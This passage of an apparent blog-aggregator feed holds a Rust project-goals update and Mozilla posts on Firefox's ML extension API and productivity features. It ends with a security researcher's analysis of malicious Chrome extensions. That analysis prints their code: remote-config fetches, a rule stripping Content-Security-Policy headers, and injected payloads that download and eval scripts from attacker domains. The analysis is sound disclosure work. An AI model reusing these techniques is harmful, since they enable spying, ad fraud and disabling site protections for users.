  • We have had fruitful discussions about the trait for async iteration but do not have widespread consensus; that's on the docket for 2025H1.

We largely completed our goal to stabilize the language features used by the Rust for Linux project. In some cases a small amount of work remains. Over the last six months, we...

  • stabilized the offset_of! macro to get the offset of fields;
  • almost stabilized the CoercePointee trait -- but discovered that the current implementation was revealing unstable details, which is currently being resolved;
  • put up the asm_goto stabilization PR and reference updates, excluding the "output" feature;
  • completed the majority of the work for arbitrary self types, which is being used by RfL and just needs documentation before stabilization.

We also began work on compiler flag stabilization with RFC 3716, which outlines a scheme for stabilizing flags that modify the target ABI.

Big shout-outs to Ding Xiang Fei, Alice Ryhl, Adrian Taylor, and Gary Guo for doing the lion's share of the work here.

The final release of Rust 2024 is confirmed for February 20, 2025 as part of Rust 1.85. Rust 1.85 is currently in beta. Feedback from the nightly beta and crater runs has been actively addressed, with adjustments to migrations and documentation to enhance user experience.

Big shout-outs to TC and Eric Huss for their hard work driving this program forward.

Final goal updates

Over the last six months a number of internal refactorings have taken place that are necessary to support a min_generic_const_args prototype.

One refactoring is that we have changed how we represent const arguments in the compiler to allow for adding a separate representation for the kinds of const arguments that min_generic_const_args will add.

Another big refactoring is that we have changed the API surface for our representation of const arguments in the type system layer: there is no longer a way to evaluate a const argument without going through our general purpose type system logic. This was necessary to ensure that we correctly handle equality of the kinds of const arguments that min_generic_const_args will support.

With all of these pre-requisite refactorings completed, a feature gate has been added to the compiler (feature(min_generic_const_args)) that uses the new internal representation of const arguments. We are now beginning to implement the actual language changes under this feature gate.

Shout-out to camelid, boxy and compiler-errors.

Over the course of the last six months...

  • cargo semver-checks began to include generic parameters and bounds in its schema, allowing for more precise lints;
  • cargo manifest linting was implemented and merged, allowing for lints that look at the cargo manifest;
  • building on cargo manifest linting, the feature_missing lint was added, which identifies breakage caused by the removal of a package feature.

In addition, we fleshed out a design sketch for the changes in rustdoc's JSON support that are needed to support cross-crate item linting. This in turn requires compiler extensions to supply that information to rustdoc.

  • Progress was made on adding const traits and implementation in the compiler, with improvements being carefully considered. Add was constified in rust#133237 and Deref/DerefMut in rust#133260.
  • Further progress was made on implementing stability for the const traits feature in rust#132823 and rust#133999, with additional PRs constifying more traits open at rust#133995 and rust#134628.
  • Over the last six months, we created a lang-team experiment devoted to this issue and spastorino began work on an experimental implementation. joshtriplett authored RFC 3680, which has received substantial feedback. The current work is focused on identifying "cheaply cloneable" types and making it easy to create closures that clone them instead of moving them.
  • Alternatives to sandboxed build scripts are going to be investigated instead of continuing this project goal into 2025h1 - namely, declaratively configuring system dependencies with system-deps, using an approach similar to code-checker Cackle and its sandbox environment Bubblewrap, or fully-sandboxed build environments like Docker or Nix.
  • Significant speedups have been achieved, reducing the slowest crate resolution time from over 120 seconds to 11 seconds, and decreasing the time to check all crates from 178 minutes to 71.42 minutes.
  • Performance improvements have been made to both the existing resolver and the new implementation, with the lock file verification time for all crates reduced from 44.90 minutes to 32.77 minutes (excluding some of the hardest cases).
  • Our pull request adding example searches and a search button has been added to the agenda for the rustdoc team's next meeting.
  • The -Znext-solver=coherence feature is now stable in version 1.84, with a new update blogpost published.
  • Significant progress was made on bootstrap with -Znext-solver=globally. We're now able to compile rustc and cargo, enabling try-builds and perf runs.
  • An optimisation for the #[clippy::msrv] lint is open, benchmarked, and currently under review.
  • Help is needed on any issue marked with performance-project, especially on issue #13714.
  • Over the course of this goal, Nadrieril wrote and posted the never patterns RFC as an attempt to make progress without figuring out the whole picture, and the general feedback was "we want to see the whole picture". Next step will be to write up an RFC that includes a clear proposal for which empty patterns can and cannot be omitted. This is 100% bottlenecked on my own writing bandwidth (reach out if you want to help!). Work will continue but the goal won't be resubmitted for 2025h1.
  • Amanda has made progress on removing placeholders, focusing on lazy constraints and early error reporting, as well as investigating issues with rewriting type tests; a few tests are still failing, and it seems error reporting and diagnostics will be hard to keep exactly as they are today.
  • @lqd has opened PRs to land the prototype of the location-sensitive analysis. It's working well enough that it's worthwhile to land; there is still a lot of work left to do, but it's a major milestone, which we hoped to achieve with this project goal.
  • A fix stopping cargo-script from overriding the release profile was posted and merged.
  • Help is wanted for writing frontmatter support in rustc, as rustfmt folks are requesting it to be represented in the AST.
  • RFC is done, waiting for all rustdoc team members to take a look before implementation can start.
  • SparrowLii proposed a 2025H1 project goal to continue stabilizing the parallel front end, focusing on solving reproducible deadlock issues and improving parallel compilation performance.
  • The team discussed solutions to avoid potential deadlocks, finding that disabling work-stealing in rayon's subloops is effective, and will incorporate related modifications in a PR.
  • Progress on annotate-snippets continued despite a busy schedule, with a focus on improving suggestions and addressing architectural challenges.
  • A new API was designed in collaboration with epage, aiming to align annotate-snippets more closely with rustc for easier contribution and integration.
  • The project goal slate for 2025h1 has been posted as an RFC and is waiting on approval from project team leads.
  • Another pull request was merged with only one remaining until a working MVP is available on nightly.
  • Some features were removed to simplify upstreaming and will be added back as single PRs.
  • Work will start on the batching feature of LLVM/Enzyme, which allows array-of-structs and struct-of-arrays vectorization.
  • There's been a push to add an AMD GPU target to the compiler, which would have been needed for the LLVM offload project.
  • We have written and verified around 220 safety contracts in the verify-rust-std fork.
  • 3 out of 14 challenges have been solved.
  • We have successfully integrated Kani in the repository CI, and we are working on the integration of two other verification tools: VeriFast and Goto-transcoder (ESBMC).
  • There wasn't any progress on this goal, but building a community around a-mir-formality is still a goal and future plans are coming.

Goals without updates

The following goals have not received updates in the last month:

  1. As everyone knows, the hardest part of computer science is naming. I think we rocked this one.

The Mozilla Blog: Running inference in web extensions

Image generated by DALL·E using the following prompt: A person standing on a platform in the ocean, surrounded by big waves. They are holding a sail with a big Firefox logo on it. Make it like Hokusai’s The Great Wave off Kanagawa print and make sure the boat looks like it can actually stay afloat

We’re shipping a new API in Firefox Nightly that will let you use our Firefox AI runtime to run offline machine learning tasks in your web extension.

Firefox AI Runtime

We’ve recently shipped a new component inside of Firefox that leverages Transformers.js (a JavaScript equivalent of Hugging Face’s Transformers Python library) and the underlying ONNX runtime engine. This component lets you run any machine learning model that is compatible with Transformers.js in the browser, with no server-side calls beyond the initial download of the models. This means Firefox can run everything on your device and avoid sending your data to third parties.

Web applications can already use Transformers.js in vanilla JavaScript, but running through our platform offers some key benefits:

  • The inference runtime is executed in a dedicated, isolated process, for safety and robustness
  • Model files are stored using IndexedDB and shared across origins
  • Firefox-specific performance improvements are done to accelerate the runtime

This platform shipped in Firefox 133 to provide alt text for images in PDF.js, and will be used in several other places in Firefox 134 and beyond to improve the user experience.

We also want to unblock the community’s ability to experiment with these capabilities. Starting later today, developers will be able to access a new trial “ml” API in Firefox Nightly. This API is basically a thin wrapper around Firefox’s internal API, but with a few additional restrictions for user privacy and security.

There are two major differences between this API and most other WebExtensions APIs: the API is highly experimental and permission to use it must be requested after installation.

This new API is virtually guaranteed to change in the future. To help set developer expectations, the “ml” API is exposed under the “browser.trial” namespace rather than directly on the “browser” global object. Any API exposed on “browser.trial” may not be compatible across major versions of Firefox. Developers should guard against breaking changes using a combination of feature detection and strict_min_version declarations. You can see a more detailed description of how to write extensions with it in our documentation.
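
The feature-detection half of that guard can be as small as a null-safe lookup. Here is a minimal sketch (the helper names are ours, not part of the API); the check takes the browser object as a parameter so it can also be exercised outside an extension:

```javascript
// Returns true only if the experimental trial ML namespace exists.
// In an extension you would call hasTrialMl(globalThis.browser).
function hasTrialMl(browserApi) {
  return Boolean(browserApi && browserApi.trial && browserApi.trial.ml);
}

// Example: pick a code path depending on availability, instead of
// crashing on Firefox versions where the namespace is absent.
function summarizerBackend(browserApi) {
  return hasTrialMl(browserApi) ? "ml" : "unavailable";
}
```

Pairing this runtime check with a strict_min_version declaration in the manifest covers both installation-time and runtime compatibility.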

Running an inference task

Performing inference directly in the browser is quite exciting. We expect people will be able to build compelling features using the browser’s data locally.

Like the original Transformers that inspired it, Transformers.js uses “tasks” to abstract away implementation details for performing specific kinds of ML workloads. You can find a description of all tasks that Transformers.js supports in the project’s official documentation.

For our first iteration, Firefox exposes the following tasks:

  • text-classification – assigning a label or class to a given text
  • token-classification – assigning a label to each token in a text
  • question-answering – retrieving the answer to a question from a given text
  • fill-mask – masking some of the words in a sentence and predicting which words should replace those masks
  • summarization – producing a shorter version of a document while preserving its important information
  • translation – converting text from one language to another
  • text2text-generation – converting one text sequence into another text sequence
  • text-generation – producing new text by predicting the next word in a sequence
  • zero-shot-classification – classifying text into classes that are unseen during training
  • image-to-text – outputting text from a given image
  • image-classification – assigning a label or class to an entire image
  • image-segmentation – dividing an image into segments where each pixel is mapped to an object
  • zero-shot-image-classification – classifying images into classes that are unseen during training
  • object-detection – identifying objects of certain defined classes within an image
  • zero-shot-object-detection – identifying objects of classes that are unseen during training
  • document-question-answering – answering questions on a document image
  • image-to-image – transforming a source image to match the characteristics of a target image or a target image domain
  • depth-estimation – predicting the depth of objects present in an image
  • feature-extraction – transforming raw data into numerical features that can be processed while preserving the information in the original dataset
  • image-feature-extraction – transforming raw data into numerical features that can be processed while preserving the information in the original image

For each task, we’ve selected a default model; see the list in EngineProcess.sys.mjs on mozsearch. These curated models are all stored in our Model Hub at https://model-hub.mozilla.org/. A Model Hub is how Hugging Face defines an online storage of models, see The Model Hub. Whether used by Firefox itself or an extension, models are automatically downloaded on first use and cached.

Below is an example showing how to run a summarizer in your extension with the default model:

async function summarize(text) {
  await browser.trial.ml.createEngine({taskName: "summarization"});
  const result = await browser.trial.ml.runEngine({args: [text]});
  return result[0]["summary_text"];
}

If you want to use another model, you can use any model published on Hugging Face by Xenova or the Mozilla organization. For now, we’ve restricted downloading models from those two organizations, but we might relax this limitation in the future.

To use an allow-listed model from Hugging Face, pass an options object that sets “modelHub” to “huggingface” and “taskName” to the appropriate task when creating an engine.

Let’s modify the previous example to use a model that can summarize larger texts:

async function summarize(text) {
  await browser.trial.ml.createEngine({
    taskName: "summarization", 
    modelHub: "huggingface", 
    modelId: "Xenova/long-t5-tglobal-base-16384-book-summary"
   });
  const result = await browser.trial.ml.runEngine({args: [text]});
  return result[0]["summary_text"];
}

Our PDF.js alt text feature follows the same pattern:

  • Get the image to describe
  • Use the “image-to-text” task with the “mozilla/distilvit” model
  • Run the inference and return the generated text

This feature is built directly into Firefox, but we’ve also made a web extension example out of it, which you can find in our source code and use as a basis to build your own: see https://searchfox.org/mozilla-central/source/toolkit/components/ml/docs/extensions-api-example. For instance, it includes code to request the relevant permission and a model download progress bar.

We’d love to hear from you

This API is our first attempt to enable the community to build on top of our Firefox AI Runtime. We want to make this API as simple and powerful as possible.

We believe that offering this feature to web extensions developers will help us learn and understand if and how such an API could be developed as a web standard in the future.

We’d love to hear from you and see what you are building with this.

Come say hi in our dedicated Mozilla AI Discord channel, #firefox-ai. Discord invitation: https://discord.gg/Jmmq9mGwy7

Last but not least, we’re giving a deep-dive talk at FOSDEM in the Mozilla room on Sunday, February 2nd in Brussels. There will be many interesting talks in that room; see: https://fosdem.org/2025/schedule/track/mozilla/

The post Running inference in web extensions appeared first on The Mozilla Blog.

The Mozilla Blog: Supercharge your day: Firefox features for peak productivity

Illustration of a browser interface with five large icons: a pin, magnifying glass, sparkles, an "X," and a menu, set against a gradient orange and yellow background with playful shapes like lightning bolts and stars.

Hi, I’m Tapan. As the leader of Firefox’s Search and AI efforts, my mission is to help users find what they are looking for on the web and stay focused on what truly matters. Outside of work, I indulge my geek side by building giant Star Wars Lego sets and sharing weekly leadership insights through my blog, Building Blocks. These hobbies keep me grounded and inspired as I tackle the ever-evolving challenges of the digital world.

I’ve always been fascinated by the internet — its infinite possibilities, endless rabbit holes and the wealth of knowledge just a click away. But staying focused online can feel impossible. I spend my days solving user problems, crafting strategies, and building products that empower people to navigate the web more effectively. Yet, even I am not immune to the pull of distraction. Let me paint you a picture of my daily online life. It’s a scene many of you might recognize: dozens of tabs open, notifications popping up from every corner, and a long to-do list staring at me. In this chaos, I’ve learned that staying focused requires intention and the right tools.

Over the years, I have discovered several Firefox features that are absolute game-changers for staying productive online:

1. Pinned Tabs: Anchor your essentials

Pinned Tabs get me to my most essential tabs in one click. I have a few persistent pinned tabs — my email, calendar, and files — and a few “daily” pinned tabs — my “must-dos” of the day. This is my secret weapon for keeping my workspace organized. Pinned Tabs stay put and don’t clutter my tab bar, making it easy to switch between key resources without hunting through my tab list.

To pin a tab, right-click it and select “Pin Tab.” Now, your essential tabs will always be at your fingertips.

2. Search: Use the fast lane

The “@” shortcut is my productivity superpower, taking me to search results in a flash. By typing “@amazon,” “@bing,” or “@history” followed by your search terms, you can instantly search those platforms or your browsing history without leaving your current page. This saves me time by letting me jump right to search results.

In the next Firefox update, we are making the search term persistent in the address bar so that you can use the address bar to refine your searches for supported sites.

To search supported sites, type “@” in the address bar and pick any engine from the supported list.

3. AI-powered summarization: Cut to the chase

This is one of my favorite recent additions to Firefox. Our AI summarization feature can distill long articles or documents into concise summaries, helping you grasp the key points without wading through endless text. Recently, I used Firefox’s AI summarization to condense sections of research papers on AI. This helped me quickly grasp the key findings and apply them to our strategy discussions for enhancing Firefox’s AI features. Using AI to help build AI!

To use AI-powered summarization, type “about:preferences#experimental” in the address bar and enable “AI chatbot.” Pick your favorite chatbot and sign in. Select any text on a page you wish to summarize and right-click to pick “Ask <your chatbot>.” We are adding new capabilities to this list with every release.

4. Close Duplicate Tabs: Declutter your workspace

If you are like me, you’ve probably opened the same webpage multiple times without realizing it. Firefox’s “Close Duplicate Tabs” feature eliminates this problem.

By clicking the tab list icon at the top-right corner of the Firefox window, you can detect and close duplicate tabs, keeping your workspace clean and reducing mental load. This small but mighty tool is for anyone prone to tab overload.

5. Reader View: Eliminate distractions

Reader View transforms cluttered web pages into clean, distraction-free layouts. You can focus entirely on the content by stripping away ads, pop-ups, and other distractions. Whether reading an article or researching, this feature keeps your mind on the task.

To enable it, click the Reader View icon in the address bar when viewing a page.

These Firefox features have transformed how I navigate the web, helping me stay focused, productive, and in control of my time online. Whether managing a complex task, diving into research, or just trying to stay on top of your daily tasks, these tools can help you take charge of your browsing experience.

What are your favorite Firefox productivity tips? I would love to hear how you customize Firefox to fit your life.

Let’s make the web work for us!

Get Firefox

Get the browser that protects what’s important

The post Supercharge your day: Firefox features for peak productivity appeared first on The Mozilla Blog.

Wladimir Palant: Malicious extensions circumvent Google’s remote code ban

As noted last week, I consider it highly problematic that Google for a long time allowed extensions to run code they downloaded from some web server, an approach that Mozilla prohibited long before Google even introduced extensions to their browser. For years this has been an easy way for malicious extensions to hide their functionality. When Google finally changed their mind, it came not in the form of a policy but as a technical change introduced with Manifest V3.

As with most things about Manifest V3, these changes are meant for well-behaving extensions where they in fact improve security. As readers of this blog probably know, those who want to find loopholes will find them: I’ve already written about the Honey extension bundling its own JavaScript interpreter and malicious extensions essentially creating their own programming language. This article looks into more approaches I found used by malicious extensions in Chrome Web Store. And maybe Google will decide to prohibit remote code as a policy after all.

Screenshot of a Google webpage titled “Deal with remote hosted code violations.” The page text visible in the screenshot says: Remotely hosted code, or RHC, is what the Chrome Web Store calls anything that is executed by the browser that is loaded from someplace other than the extension's own files. Things like JavaScript and WASM. It does not include data or things like JSON or CSS.

Update (2025-01-20): Added two extensions to the bonus section. Also indicated in the tables which extensions are currently featured in Chrome Web Store.

Update (2025-01-21): Got a sample of the malicious configurations for Phoenix Invicta extensions. Added a section describing it and removed “But what do these configurations actually do” section. Also added a bunch more domains to the IOCs section.

Update (2025-01-28): Corrected the “Netflix Party” section, Flipshope extension isn’t malicious after all. Also removed the attribution subsection here.

Summary of the findings

This article originally started as an investigation into Phoenix Invicta Inc. Consequently, this is the best researched part of it. While I could attribute only 14 extensions with rather meager user numbers to Phoenix Invicta, that’s likely because they’ve only started recently. I could find a large number of domain names, most of which aren’t currently being used by any extensions. A few are associated with extensions that have been removed from Chrome Web Store but most seem to be reserved for future use.

It can be assumed that these extensions are meant to inject ads into web pages, yet Phoenix Invicta clearly put some thought into plausible deniability. They can always claim their execution of remote code to be a bug in their otherwise perfectly legitimate extension functionality. So it will be interesting to see how Google will deal with these extensions, lacking (to my knowledge) any policies that apply here.

The malicious intent is a bit more obvious with Netflix Party and related extensions. This shouldn’t really come as a surprise to Google: the most popular extension of the group was a topic on this blog back in 2023, and a year before that McAfee already flagged two extensions of the group as malicious. Yet here we are, and these extensions are still capable of spying, affiliate fraud and cookie stuffing as described by McAfee. If anything, their potential to do damage has only increased.

Finally, the group of extensions around Sweet VPN is the most obviously malicious one. To be fair, what these extensions do is probably best described as obfuscation rather than remote code execution. Still, they download extensive instructions from their web servers even though these aren’t too flexible in what they can do without requiring changes to the extension code. Again there is spying on the users and likely affiliate fraud as well.

In the following sections I will be discussing each group separately, listing the extensions in question at the end of each section. There is also a complete list of websites involved in downloading instructions at the end of the article.

Phoenix Invicta

Let’s first take a look at an extension called “Volume Booster - Super Sound Booster.” It is one of several similar extensions and it is worth noting that the extension’s code is neither obfuscated nor minified. It isn’t hiding any of its functionality, relying on plausible deniability instead.

For example, in its manifest this extension requests access to all websites:

"host_permissions": [
  "http://*/*",
  "https://*/*"
],

Well, it obviously needs that access because it might have to boost volume on any website. Of course, it would be possible to write this extension in a way that the activeTab permission would suffice. But it isn’t built in this way.
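
For comparison, a narrowly scoped booster could get by with activeTab, which grants access to a page only after the user clicks the extension’s toolbar button. A hypothetical manifest fragment (a sketch, not the extension’s actual manifest):

```json
{
  "manifest_version": 3,
  "permissions": ["activeTab", "scripting"],
  "action": { "default_title": "Boost volume on this tab" }
}
```

With this setup the extension cannot touch any website until the user explicitly invokes it there, which is all a volume booster needs.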

Similarly, one could easily write a volume booster extension that doesn’t need to download a configuration file from some web server. In fact, this extension works just fine with its default configuration. But it will still download its configuration roughly every six hours just in case (code slightly simplified for readability):

let res = await fetch(`https://super-sound-booster.info/shortcuts?uuid=${userId}`,{
    method: 'POST',
    body: JSON.stringify({installParams}),
    headers: { 'Content-Type': 'text/plain' }
});
let data = await res.json();
if (data.shortcuts) {
    chrome.storage.local.set({
        shortcuts: {
            list: data.shortcuts,
            updatedAt: Date.now(),
        }
    });
}
if (data.volumeHeaders) {
    chrome.storage.local.set({
        volumeHeaderRules: data.volumeHeaders
    });
}
if (data.newsPage) {
    this.openNewsPage(data.newsPage.pageId, data.newsPage.options);
}

This will send a unique user ID to a server which might then respond with a JSON file. Conveniently, the three possible values in this configuration file correspond to three malicious functions of the extension.
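
Putting the pieces together, a server response might look roughly like this. The three top-level keys come from the code above; the inner structure is a guess for illustration only:

```json
{
  "shortcuts": [
    { "html": "<div class=\"shortcut\">…</div>", "pattern": "^https://example\\.com/" }
  ],
  "volumeHeaders": [],
  "newsPage": { "pageId": "promo", "options": { "active": false } }
}
```

The newsPage shape (pageId plus options) matches what the handler passes to openNewsPage; the shortcut fields are hypothetical stand-ins for the HTML snippet and the URL regular expression described below.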

Injecting HTML code into web pages

The extension contains a default “shortcut” which it will inject into all web pages. It can typically be seen in the lower right corner of a web page:

Screenshot of a web page footer with the Privacy, Terms and Settings links. Overlaying the latter is a colored diagonal arrow with a rectangular pink border.

And if you move your mouse pointer to that button a message shows up:

Screenshot of a web page footer. Overlaying it is a pink pop-up saying: To go Full-Screen, press F11 when watching a video.

That’s it, it doesn’t do anything else. This “feature” makes no sense but it provides the extension with plausible deniability: it has a legitimate reason to inject HTML code into all web pages.

And of course that “shortcut” is remotely configurable. So the shortcuts value in the configuration response can define other HTML code to be injected, along with a regular expression determining which websites it should be applied to.

“Accidentally” this HTML code isn’t subject to the remote code restrictions that apply to browser extensions. After all, any JavaScript code contained here would execute in the context of the website, not in the context of the extension. While that code wouldn’t have access to the extension’s privileges, the end result is pretty much the same: it could e.g. spy on the user as they use the web page, transmit login credentials being entered, inject ads into the page and redirect searches to a different search engine.

Abusing declarativeNetRequest API

There is only a slight issue here: a website might use a security mechanism called Content Security Policy (CSP). That mechanism can, for example, restrict what kind of scripts are allowed to run on the website, in the same way the browser restricts the allowed scripts for the extension.

The extension solves this issue by abusing the immensely powerful declarativeNetRequest API. Looking at the extension manifest, a static rule is defined for this API:

[
    {
        "id": 1,
        "priority": 1,
        "action": {
            "type": "modifyHeaders",
            "responseHeaders": [
                { "header": "gain-id", "operation": "remove" },
                { "header": "basic-gain", "operation": "remove" },
                { "header": "audio-simulation-64-bit", "operation": "remove" },
                { "header": "content-security-policy", "operation": "remove" },
                { "header": "audio-simulation-128-bit", "operation": "remove" },
                { "header": "x-frame-options", "operation": "remove" },
                { "header": "x-context-audio", "operation": "remove" }
            ]
        },
        "condition": { "urlFilter": "*", "resourceTypes": ["main_frame","sub_frame"] }
    }
]

This removes a bunch of headers from all HTTP responses. Most headers listed here are red herrings – a gain-id HTTP header for example doesn’t really exist. But removing the Content-Security-Policy header is meant to disable CSP protection on all websites. And removing the X-Frame-Options header disables another security mechanism that might prevent injecting frames into a website. This probably means that the extension is meant to inject advertising frames into websites.

But these default declarativeNetRequest rules aren’t the end of the story. The volumeHeaders value in the configuration response allows adding more rules whenever the server decides that some are needed. As these rules aren’t code, the usual restrictions against remote code don’t apply here.

The name seems to suggest that these rules are all about messing with HTTP headers. And maybe this actually happens, e.g. adding cookie headers required for cookie stuffing. But judging from other extensions, the main point is rather preventing any installed ad blockers from blocking ads displayed by the extension. Yet these rules provide even more damage potential. For example, declarativeNetRequest allows “redirecting” requests, which at first glance is a very convenient way to perform affiliate fraud. It also allows “redirecting” a request when a website loads a script from a trusted source, making it receive a malicious script instead – another way to hijack websites.
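To illustrate the abuse potential, here is what a server-supplied rule could look like. This is a hypothetical example (not a rule observed in the wild) that swaps a script loaded from a trusted source for a malicious one; the domain names are placeholders:

```json
[
    {
        "id": 1000,
        "priority": 2,
        "action": {
            "type": "redirect",
            "redirect": { "url": "https://malicious.example/evil.js" }
        },
        "condition": {
            "urlFilter": "||trusted.example/library.js",
            "resourceTypes": ["script"]
        }
    }
]
```

Because this is declarative data rather than code, it sails past the Chrome Web Store’s restrictions on remotely hosted code.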

Side-note: This abuse potential is the reason why legitimate ad blockers, while downloading their rules from a web server, never make these rules as powerful as the declarativeNetRequest API. It’s bad enough that a malicious rule could break the functionality of a website, but it shouldn’t be able to spy on the user for example.

Opening new tabs

Finally, there is the newsPage value in the configuration response. It is passed to the openNewsPage function, which is essentially a wrapper around the tabs.create() API. This will load a page in a new tab, something that extension developers typically use for benign things like asking for donations.

Except that Volume Booster and similar extensions don’t merely take a page address from the configuration but also some options. Volume Booster will accept any options; other extensions sometimes allow only specific options instead. One option that the developers of these extensions seem to particularly care about is active, which allows opening tabs in the background. This makes me suspect that the point of this feature is displaying pop-under advertisements.
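The mechanism can be sketched in a few lines. This is a hypothetical reconstruction (the function and config names are stand-ins, not the extension’s actual identifiers), with the chrome.tabs API mocked so the sketch runs outside a browser:

```javascript
// Sketch: passing server-supplied options straight through to
// tabs.create() lets the server open background tabs, i.e. pop-unders.
function openNewsPage(config, tabsApi) {
  // The server controls both the address and the options object.
  tabsApi.create({ url: config.newsPage, ...config.options });
}

// Mock of the chrome.tabs API for illustration outside a browser:
const created = [];
const tabsMock = { create: opts => created.push(opts) };

openNewsPage(
  { newsPage: "https://ads.example/news", options: { active: false } },
  tabsMock
);
// created[0] now describes a tab opened in the background
```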

The scheme summarized

There are many extensions similar to Volume Booster. The general approach seems to be:

  1. Make sure that the extension has permission to access all websites. Find a pretense why this is needed – or don’t, Google doesn’t seem to care too much.
  2. Find a reason why the extension needs to download its configuration from a web server. It doesn’t need to be convincing, nobody will ever ask why you couldn’t just keep that “configuration” in the extension.
  3. Use a part of that configuration in HTML code that the extension will inject in web pages. Of course you should “forget” to do any escaping or sanitization, so that HTML injection is possible.
  4. Feed another part of the configuration to declarativeNetRequest API. Alternatively (or additionally), use static rules in the extension that will remove pesky security headers from all websites, nobody will ask why you need that.

Not all extensions implement all of these points. With some of the extensions the malicious functionality seems incomplete. I assume that it isn’t added all at once; instead, support for malicious configurations is introduced slowly to avoid raising suspicions. And maybe for some extensions the current state is considered “good enough,” so nothing more is to come.

The payload

After I had already published this article, I finally got a sample of the malicious “shortcut” value, to be applied on all websites. Unsurprisingly, it had the form:

<img height="1" width="1" src="data:image/gif;base64,…"
     onload="(() => {…})();this.remove()">

This injects an invisible image into the page, runs some JavaScript code via its load event handler and removes the image again. The JavaScript code consists of two code blocks. The first block goes like this:

if (isGoogle() || isFrame()) {
    hideIt();
    const script = yield loadScript();
    if (script) {
        window.eval.call(window, script);
        window.gsrpdt = 1;
        window.gsrpdta = '_new'
    }
}

The isGoogle function looks for a Google subdomain and a query – this is about search pages. The isFrame function looks for frames but excludes “our frames” where the address contains all the strings q=, frmid and gsc.page. The loadScript function fetches a script from https://shurkul[.]online/v1712/g1001.js. This script then injects a hidden frame into the page, loaded either from kralforum.com.tr (Edge) or rumorpix.com (other browsers). There is also some tracking to an endpoint on dev.astralink.click but the main logic operating the frame is in the other code block.

The second code block looks like this (somewhat simplified for readability):

if (window.top == window.self) {
    let response = await fetch('https://everyview.info/c', {
        method: 'POST',
        body: btoa(unescape(encodeURIComponent(JSON.stringify({
            u: 'm5zthzwa3mimyyaq6e9',
            e: 'ojkoofedgcdebdnajjeodlooojdphnlj',
            d: document.location.hostname,
            t: document.title,
            'iso': 4
        })))),
        headers: {
            'Content-Type': 'text/plain'
        },
        credentials: 'include'
    });
    let text = await response.text();
    runScript(decodeURIComponent(escape(atob(text))));
} else {
    window.addEventListener('message', function(event) {
        event && event.data && event.data.boosterWorker &&
            event.data.booster && runScript(event.data.booster);
    });
}

So for top-level documents this downloads some script from everyview.info and runs it. That script in turn injects another script from lottingem.com. And that script loads some ads from gulkayak.com or topodat.info as well as Google ads, makes sure these are displayed in the frame, and positions the frame above the search results. The result is ads that can barely be distinguished from actual search results; here is what I get searching for “amazon” for example:

Screenshot of what looks like Google search results, e.g. a link titled “Amazon Produkte - -5% auf alle Produkte”. The website mentioned above it is conrad.de however rather than amazon.de.

The second code block also has some additional tracking going to doubleview.online, astato.online, doublestat.info, triplestat.online domains.

The payloads I got for the Manual Finder 2024 and Manuals Viewer extensions are similar but not identical. In particular, these use fivem.com.tr domain for the frame. But the result is essentially the same: ads that are almost impossible to distinguish from the search results. In this screenshot the link at the bottom is a search result, the one above it is an ad:

Screenshot of search results. Above a link titled “Amazon - Import US to Germany” with the domain myus.com. Below an actual Amazon.de link. Both have exactly the same visuals.

Who is behind these extensions?

These extensions are associated with a company named Phoenix Invicta Inc, formerly Funteq Inc. While supposedly a US company of around 20 people, its terms of service claim to be governed by Hong Kong law, all while the company hires its employees in Ukraine. While it doesn’t seem to have any physical offices, the company offers its employees the use of two co-working spaces in Kyiv. To add even more confusion, Funteq Inc. was registered in the US with its “office address” being a two room apartment in Moscow.

Before founding this company in 2016, its CEO worked as CTO of something called Ormes.ru. Apparently, Ormes.ru was in the business of monetizing apps and browser extensions. Its sales pitches can still be found all over the web, offering extension developers ways to earn money with various kinds of ads. Clearly, there has been some competence transfer here.

Occasionally Phoenix Invicta websites will claim to be run by another company named Damiko Inc. Of course these claims don’t have to mean anything, as the same websites will also occasionally claim to be run by a company in the business of … checks notes … selling knives.

Yet Damiko Inc. is officially offering a number of extensions in the Chrome Web Store. And while these certainly aren’t the same as the Phoenix Invicta extensions, all but one of these extensions share certain similarities with them. In particular, these extensions remove the Content-Security-Policy HTTP header despite having no means of injecting HTML content into web pages from what I can tell.

Damiko Inc. appears to be a subsidiary of the Russian TomskSoft LLC, operating in the US under the name Tomsk Inc. How does this fit together? Did TomskSoft contract Phoenix Invicta to develop browser extensions for them? Or is Phoenix Invicta another subsidiary of TomskSoft? Or some other construct maybe? I don’t know. I asked TomskSoft for comment on their relationship with this company but haven’t received a response so far.

The affected extensions

The following extensions are associated with Phoenix Invicta:

Name Weekly active users Extension ID Featured
Click & Pick 20 acbcnnccgmpbkoeblinmoadogmmgodoo
AdBlock for Youtube: Skip-n-Watch 3,000 coebfgijooginjcfgmmgiibomdcjnomi
Dopni - Automatic Cashback Service 19 ekafoahfmdgaeefeeneiijbehnbocbij
SkipAds Plus 95 emnhnjiiloghpnekjifmoimflkdmjhgp
1-Click Color Picker: Instant Eyedropper (hex, rgb, hsl) 10,000 fmpgmcidlaojgncjlhjkhfbjchafcfoe
Better Color Picker - pick any color in Chrome 10,000 gpibachbddnihfkbjcfggbejjgjdijeb
Easy Dark Mode 869 ibbkokjdcfjakihkpihlffljabiepdag
Manuals Viewer 101 ieihbaicbgpebhkfebnfkdhkpdemljfb
ScreenCapX - Full Page Screenshot 20,000 ihfedmikeegmkebekpjflhnlmfbafbfe
Capture It - Easy Screenshot Tool (Full Page, Selected, Visible Area) 48 lkalpedlpidbenfnnldoboegepndcddk
AdBlock - Ads and Youtube 641 nonajfcfdpeheinkafjiefpdhfalffof
Manual Finder 2024 280 ocbfgbpocngolfigkhfehckgeihdhgll
Volume Booster - Super Sound Booster 8,000 ojkoofedgcdebdnajjeodlooojdphnlj
Font Expert: Identify Fonts from Images & Websites 666 pjlheckmodimboibhpdcgkpkbpjfhooe

The following table also lists the extensions officially developed by Damiko Inc. With these, there is no indication of malicious intent, yet all but the last one share similarities with Phoenix Invicta extensions above and remove security headers.

Name Weekly active users Extension ID Featured
Screen Recorder 685 bgnpgpfjdpmgfdegmmjdbppccdhjhdpe
Halloween backgrounds and stickers for video calls and chats 31 fklkhoeemdncdhacelfjeaajhfhoenaa
AI Webcam Effects + Recorder: Google Meet, Zoom, Discord & Other Meetings 46 iedbphhbpflhgpihkcceocomcdnemcbj
Beauty Filter 136 mleflnbfifngdmiknggikhfmjjmioofi
Background Noise Remover 363 njmhcidcdbaannpafjdljminaigdgolj
Camera Picture In Picture (PIP Overlay) 576 pgejmpeimhjncennkkddmdknpgfblbcl

Netflix Party

